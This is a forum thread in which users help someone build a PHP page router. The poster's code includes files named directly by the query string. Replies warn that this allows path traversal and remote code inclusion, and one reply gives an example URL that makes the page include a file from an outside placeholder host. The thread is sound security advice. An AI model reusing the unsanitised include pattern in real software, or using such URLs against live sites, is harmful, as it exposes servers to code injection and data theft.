if(substr($_SERVER['QUERY_STRING'], 0, 9) == 'thetalent')
echo 'TabOn';
else
echo 'TabOff';

You can do it with regular expressions too, but regular expressions are evil.

No prob.

There are a lot of things I dislike about PHP, but a lack of built-in string manipulation functions is not among them.

Yes?

lol.

I said "evil", not "useless"

if (preg_match("/^thetalent/",$_SERVER['QUERY_STRING']))
{
echo('TabOn');
} else {
echo('TabOff');
}

but for something like this it's better to use strpos() unless you really need regular expressions. see http://php.net/strpos for reference.

Ok, rather than make a new thread I'll add an addendum question.

I'm currently using this php code:
<?php
$query = $_SERVER['QUERY_STRING'];
$query = explode(':',$query);

if(empty($query[0]) && empty($query[1]))
{
require_once 'home.php';
}
elseif(empty($query[1]))
{
require_once $query[0].'.php';
}
else
{
require_once $query[0].'/'.$query[1].'.php';
}
?> to call php files into a template file I've designed.

Using this code I am able to have address.com/?page which will call, for example, if the page was ?opportunities it would call opportunities into that page.

If I call a page from another directory I'd just put ?DirectoryName:NameOfFile

I'd like to be able to display regular URLS. Such as website.com/PageName.php or website.com/DirectoryName/PageName.php or even .html. Is this clear? If it is, does anyone know how to go about this?

there are a number of ways to do what you're asking. most of them require control over the webserver (like use of mod_rewrite, like minisweeper said, which is a way to eliminate .php from your urls, for example)

if you don't care about having a .php in there, but you don't want the question mark, you could use $_SERVER['PATH_INFO']
that way if your url was http://server.com/file.php/this/is/a/test
then from inside file.php, $_SERVER['PATH_INFO'] would be "/this/is/a/test" and you could do with that whatever you wanted.

but what's so bad about using $_GET?
if your url was http://server.com/file.php?t=x
then $_GET['t'] would be "x" and you wouldn't have to mess with explode and all that other crap.

word of advice: never just take the query string and use it to include a file (like you do in your code up there (require_once $query[0].'.php';) without doing some checking and sanitizing first. because what if i entered this url: http://your.server.com/file.php?sensitiveserverinformation
see what i'm saying? have an array of valid files and check against that, or something. don't let people enter whatever they want, and show it to them.

The least you should do is make sure they cant include *backwards* up the tree. And if they can make sure it's limited. Everyone knows about exploits in the past which let silly scripts browse to /etc/passwd and stuff.

I tested going backwards and I don't think they can... It just keeps displaying the homepage. Also, If I'm able to get the url to look normal... then they wouldn't even know to try that, would they?

maybe not the people you're writing the site for, but there are plenty of people who DO know to try just that, who go around looking for these sorts of things, in fact, and it only takes one person to figure it out.

in fact, let me give you an example. just so you realize how dangerous it can be.

http://your.server.com/file.php?http://mysite.com/myillicitcode.php

that's right, include(), by default, will happily process files from remote sites.
which means i could write any code i wanted and your file would process it right there, in place.
which means i could write some code, to say, list out the entire contents of your directory tree and/or print the contents of any file from your site i want. or launch attacks on remote sites so that it looks like you're the attacker, or spam everyone on the planet, or whatever.

do you see what i'm saying now? it's simple enough to prevent this kind of thing. you cannot include things from the query string. you just can't.

sure, i'm willing to help, if i can. you can try to describe it without getting into specifics like passwords and such - i'm sure you can figure out a way to lay it out.

you're just going to have to take my word that it's a very real, well-known and serious security problem. it's known as code injection. in fact it's spelled out under "security warning" in the official documentation for the include function. i don't know how else i can warn you.

well, assuming that you don't have any xml functions in the code you're talking about here, that xml warning is coming from the remote site, which means it is doing it

no, not at all. sorry if i'm coming across that way!

I tried emailing you but i got a mailer daemon error. Anyways, this is what I said:

Yeah, I do have database access. I'm willing to assume I've gone about
everything wrong and am open to suggestion and willing to do the base over
again. Any help would, well, help. =P

Do you know that you aren't whispering?

Yeah but you look like you're talking to yourself.

haha... i haven't been around in a while.
no, i didn't lose interest. can you try emailing me again? it's a gmail address, you shouldn't have any delivery problems.

^ question directed towards anyone.

Lol, so simple, and will reduce my php by a lot :P Thanks!

even generating blow up dolls? Awesome!

Oh, that was just baaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-d. :P

That won't work unless slap's a variable pointing to a valid function and knee's a definition.

$giginger = new Noob('php');